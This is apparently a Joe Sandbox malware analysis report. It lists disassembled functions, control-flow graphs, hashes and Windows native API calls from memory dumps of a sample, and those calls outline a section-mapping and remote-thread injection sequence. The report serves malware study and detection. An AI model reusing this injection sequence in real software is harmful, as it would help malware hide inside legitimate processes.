                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                      • Opcode ID: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                                                      • Instruction ID: a9c2a09af8f6974916e8dbce0e9e74a1ab8539b6b4ce2c8be6c8dc9eb24f9302
                                                                                                                                                      • Opcode Fuzzy Hash: 3ec7b73e90794c52acaab491f05d9b891cb3c0e9704d69be5a814fe7f5293bbb
                                                                                                                                                      • Instruction Fuzzy Hash: 675127B5900245BBEB209F91CC48FABBBB8EF85B00F104169FA11BA2E5D6759941CB24
                                                                                                                                                      Function 004014EB Relevance: 10.7, APIs: 7, Instructions: 165nativeCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 138 4014eb-401519 call 401164 143 40151b 138->143 144 40151e-401523 138->144 143->144 146 401529-40153a 144->146 147 40184d-401855 144->147 151 401540-401569 146->151 152 40184b 146->152 147->144 150 40185a-401883 147->150 160 401874-40187f 150->160 161 401886-4018a3 call 401164 150->161 151->152 159 40156f-401586 NtDuplicateObject 151->159 152->150 159->152 162 40158c-4015b0 NtCreateSection 159->162 160->161 164 4015b2-4015d3 NtMapViewOfSection 162->164 165 40160c-401632 NtCreateSection 162->165 164->165 167 4015d5-4015f1 NtMapViewOfSection 164->167 165->152 168 401638-40163c 165->168 167->165 171 4015f3-401609 167->171 168->152 172 401642-401663 NtMapViewOfSection 168->172 171->165 172->152 174 401669-401685 NtMapViewOfSection 172->174 174->152 176 40168b call 401690 174->176
                                                                                                                                                      APIs
                                                                                                                                                      • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                      • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015CE
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015EC
                                                                                                                                                      • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040162D
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 0040165E
                                                                                                                                                      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401680
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Section$View$Create$DuplicateObject
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1546783058-0
                                                                                                                                                      • Opcode ID: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                                                      • Instruction ID: 9bfdfe9cbb785be4fdfd0dd6995845ce59af7eac5c2f91023a42677e7735ba1d
                                                                                                                                                      • Opcode Fuzzy Hash: c5abebaecd196e20942843c263fe473df959be3af63705ed68d3559f17c82489
                                                                                                                                                      • Instruction Fuzzy Hash: 9D5127B5900248BBEB209F91CC48FAFBBB8EF85B00F104159FA11BA2E5D6719905CB64
                                                                                                                                                      Function 00402F5D Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 178 402f5d-402f81 179 4030b4-4030b9 178->179 180 402f87-402f9f 178->180 180->179 181 402fa5-402fb6 180->181 182 402fb8-402fc1 181->182 183 402fc6-402fd4 182->183 183->183 184 402fd6-402fdd 183->184 185 402fff-403006 184->185 186 402fdf-402ffe 184->186 187 403028-40302b 185->187 188 403008-403027 185->188 186->185 189 403034 187->189 190 40302d-403030 187->190 188->187 189->182 192 403036-40303b 189->192 190->189 191 403032 190->191 191->192 192->179 193 40303d-403040 192->193 193->179 194 403042-4030b1 RtlCreateUserThread NtTerminateProcess 193->194 194->179
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1921587553-0
                                                                                                                                                      • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                      • Instruction ID: 028c31f760cafe6bdfeacd3711728474bc178c938afdf01909161d150e4b5d3c
                                                                                                                                                      • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                                                                                                      • Instruction Fuzzy Hash: 84416831228D094FD768EF5CA845762B7D5F798351F6643AAE809D3389EA34DC1183C6
                                                                                                                                                      Function 004030BF Relevance: 3.1, APIs: 2, Instructions: 82nativethreadCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 195 4030bf-4030cf 196 4030d1-403109 195->196 197 403055-4030b1 RtlCreateUserThread NtTerminateProcess 195->197 201 403113-403118 196->201 202 40310b 196->202 198 4030b4-4030b9 197->198 203 40311a 201->203 204 40311f-403141 call 4011db 201->204 202->201 205 40310d-403110 202->205 203->204 206 40311c 203->206 211 403145 204->211 205->201 206->204 211->211
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateProcessTerminateThreadUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1921587553-0
                                                                                                                                                      • Opcode ID: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                                                      • Instruction ID: 715d93b18a869b872d6bab68aa9d9aa25fe40f65b3c459de5f1da0bbea4f6161
                                                                                                                                                      • Opcode Fuzzy Hash: c30ac68ff69c2e5b18761fee067da9d71720b063899e47dfee2d3f0b6f1a7b91
                                                                                                                                                      • Instruction Fuzzy Hash: 222105309087448FE3549F7C98423A6BFE0EB4A311F6805AFD596DA2D2D33E5A46C787
                                                                                                                                                      Function 004018C5 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 49sleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 212 4018c5-40190b call 401164 Sleep call 4013cc 222 40191a-401920 212->222 223 40190d-401915 call 4014bf 212->223 226 401931 222->226 227 401928-40192d 222->227 223->222 226->227 228 401934-40194f 226->228 227->228 233 401952-40195b call 401164 228->233 234 401948-40194b 228->234 234->233
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                      • String ID: zOji
                                                                                                                                                      • API String ID: 4152845823-4118548424
                                                                                                                                                      • Opcode ID: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                                                      • Instruction ID: 5008de21d6646d6a4101a84352d49cb2eeb815b2728bacd1896cd8e4e39b07a0
                                                                                                                                                      • Opcode Fuzzy Hash: 40e582844cb886fdd248ac7c5f774f7486ed80249be4d22e0ce5f88863c1373c
                                                                                                                                                      • Instruction Fuzzy Hash: 46018BB2308205EBDB006E949C61EAE3658AB40724F308033F607780F1C67D8A13F31B
                                                                                                                                                      Function 004018A6 Relevance: 1.3, APIs: 1, Instructions: 61sleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 237 4018a6-4018c3 241 4018d4 237->241 242 4018c8-40190b call 401164 Sleep call 4013cc 237->242 241->242 252 40191a-401920 242->252 253 40190d-401915 call 4014bf 242->253 256 401931 252->256 257 401928-40192d 252->257 253->252 256->257 258 401934-40194f 256->258 257->258 263 401952-40195b call 401164 258->263 264 401948-40194b 258->264 264->263
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                      • Opcode ID: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                                                      • Instruction ID: ec7c9f9116aa5c3d7af92c99ccf4db412f3ff1557a2b92ce3f8b18b7d449fb36
                                                                                                                                                      • Opcode Fuzzy Hash: 2e3e027024aa3d6704b47e5880310210fdf2d46df9c3430db9cfbdec36fb4464
                                                                                                                                                      • Instruction Fuzzy Hash: 97016DB2308305EBE7006A959C51EBA3758AB41764F308133B607780F1957D9A17B36F
                                                                                                                                                      Function 004018BE Relevance: 1.3, APIs: 1, Instructions: 56sleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 267 4018be-4018c3 271 4018d4 267->271 272 4018c8-40190b call 401164 Sleep call 4013cc 267->272 271->272 282 40191a-401920 272->282 283 40190d-401915 call 4014bf 272->283 286 401931 282->286 287 401928-40192d 282->287 283->282 286->287 288 401934-40194f 286->288 287->288 293 401952-40195b call 401164 288->293 294 401948-40194b 288->294 294->293
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                      • Opcode ID: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                                                      • Instruction ID: cc5cf84a4ac16d3ff6e0150408ab5a4d949569ac012fe2ee23f61dbe8ee8ec54
                                                                                                                                                      • Opcode Fuzzy Hash: 63246ced83773f111c728f1a43d3fcfa9d239b90abfb008a8a8fe5df5a230609
                                                                                                                                                      • Instruction Fuzzy Hash: 70014CB2308205EBDB106A959C51EBE3659AB55714F308133B607784F1967D9B13F32B
                                                                                                                                                      Function 004018B1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 297 4018b1-4018b3 298 401903-40190b call 4013cc 297->298 299 4018b5-4018c3 297->299 305 40191a-401920 298->305 306 40190d-401915 call 4014bf 298->306 302 4018d4 299->302 303 4018c8-401900 call 401164 Sleep 299->303 302->303 303->298 312 401931 305->312 313 401928-40192d 305->313 306->305 312->313 315 401934-40194f 312->315 313->315 322 401952-40195b call 401164 315->322 323 401948-40194b 315->323 323->322
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Sleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3472027048-0
                                                                                                                                                      • Opcode ID: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                                                      • Instruction ID: ef1b3772686a797e33556ea01ceab6b668eb93d7b49977ee198856b5a882b22d
                                                                                                                                                      • Opcode Fuzzy Hash: 551bf9fc6a161abfac80695604f19aa1aef5469406db7a931b83d04652b6e09e
                                                                                                                                                      • Instruction Fuzzy Hash: 210125B2208245EADB006A959C61EBA3799AB41724F308137F607790F1967E8A13F31B
                                                                                                                                                      Function 004018C2 Relevance: 1.3, APIs: 1, Instructions: 51sleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 326 4018c2-40190b call 401164 Sleep call 4013cc 338 40191a-401920 326->338 339 40190d-401915 call 4014bf 326->339 342 401931 338->342 343 401928-40192d 338->343 339->338 342->343 344 401934-40194f 342->344 343->344 349 401952-40195b call 401164 344->349 350 401948-40194b 344->350 350->349
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                      • Opcode ID: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                      • Instruction ID: d3c1b2561fc0583f1f6bbc3edf5ccb050f557452f45edf8007d0f6b78c0567ac
                                                                                                                                                      • Opcode Fuzzy Hash: bb19dfe290bac6874ef398e2d88654dc8a7b23ebc8c26647aeabf95c1afcae67
                                                                                                                                                      • Instruction Fuzzy Hash: 14017CB2308205EBDB006A919C51EBE3759AB41724F308133F607780F1967D8A13F31B
                                                                                                                                                      Function 004018DA Relevance: 1.3, APIs: 1, Instructions: 43sleepCOMMON
                                                                                                                                                      Download Yara Rule

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 353 4018da-40190b call 401164 Sleep call 4013cc 360 40191a-401920 353->360 361 40190d-401915 call 4014bf 353->361 364 401931 360->364 365 401928-40192d 360->365 361->360 364->365 366 401934-40194f 364->366 365->366 371 401952-40195b call 401164 366->371 372 401948-40194b 366->372 372->371
                                                                                                                                                      APIs
                                                                                                                                                      • Sleep.KERNELBASE(00001388), ref: 004018F6
                                                                                                                                                        • Part of subcall function 004014BF: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040157E
                                                                                                                                                        • Part of subcall function 004014BF: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 004015AB
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4152845823-0
                                                                                                                                                      • Opcode ID: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                      • Instruction ID: 8f9a98739febab8b32419077b991bda00f1387bd451c7178a571841fb0c6b49c
                                                                                                                                                      • Opcode Fuzzy Hash: fbcf8db84f0bcb0a2d0b0e49b2c778a116fa09cd0714ede85e20fc239748f007
                                                                                                                                                      • Instruction Fuzzy Hash: A8F044B6204205EBDB006E959C51FAE3768AB44725F344133F612790F1C67D8A52F71B

                                                                                                                                                      Non-executed Functions

                                                                                                                                                      Function 004022D9 Relevance: .1, Instructions: 73COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                                                      • Instruction ID: 407047d8813846ed623c6620c5c661c30d6a874651c06bbb2e7ade0d14a7dce7
                                                                                                                                                      • Opcode Fuzzy Hash: c7860815ad4231e939db7468cf30c1f9d63862ef5de29645b67a78e94f400ad0
                                                                                                                                                      • Instruction Fuzzy Hash: 92117D2020C541FCD321D27CCA0C911BFA99B4F72075401FBD691250C3DAB9094AEBAB
                                                                                                                                                      Function 004022D8 Relevance: .1, Instructions: 72COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                                                      • Instruction ID: 5db6927ec116302fd1a3f9be718c7712ee400501de5b38768fcc91fc62191cbb
                                                                                                                                                      • Opcode Fuzzy Hash: 62f82913357ed83049cd1887261115a72de1e32be9748c9b7b11558f6f6d0137
                                                                                                                                                      • Instruction Fuzzy Hash: 56117D2024C581ECD321D37CCA48914BFA69B4F72076801FBD691694C3CAB9454AEBAB
                                                                                                                                                      Function 004022E5 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                                                      • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                                                                                                                                                      • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                                                                                                                                                      • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                                                                                                                                                      Function 004022F7 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                                                      • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                                                                                                                                                      • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                                                                                                                                                      • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                                                                                                                                                      Function 00402321 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                                                      • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                                                                                                                                                      • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                                                                                                                                                      • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                                                                                                                                                      Function 004025D3 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                                                      • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                                                                                                                                                      • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                                                                                                                                                      • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                                                                                                                                                      Function 00402920 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                                                                                                                                                      • Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
                                                                                                                                                      • Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                                                                                                                                                      • Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704
                                                                                                                                                      Function 00402686 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000B.00000002.1525172159.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_11_2_400000_aspnet_compiler.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID:
                                                                                                                                                      • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                                                      • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                                                                                                                                                      • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                                                                                                                                                      • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                                                                                                                                                      Executed Functions

                                                                                                                                                      Function 00770C20 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: tPq
                                                                                                                                                      • API String ID: 0-789928099
                                                                                                                                                      • Opcode ID: cb9c38d11d221ce534872f48916f67ef9bef6b3d5b3db053de8d6eb0f80cdd05
                                                                                                                                                      • Instruction ID: 2bd120dd0c9731942026a3f1dc3e896daa985b81d3bf38a4e44ccd71c8285da3
                                                                                                                                                      • Opcode Fuzzy Hash: cb9c38d11d221ce534872f48916f67ef9bef6b3d5b3db053de8d6eb0f80cdd05
                                                                                                                                                      • Instruction Fuzzy Hash: 24316B35B056108FCB19AB78D45896D7BE2AF8931232508B9E406CF3B6DE36DC42CB91
                                                                                                                                                      Function 00770DB7 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.1753601388.0000000000770000.00000040.00000800.00020000.00000000.sdmp, Offset: 00770000, based on PE: false
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_770000_uahuajd.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: 8q
                                                                                                                                                      • API String ID: 0-4083045702
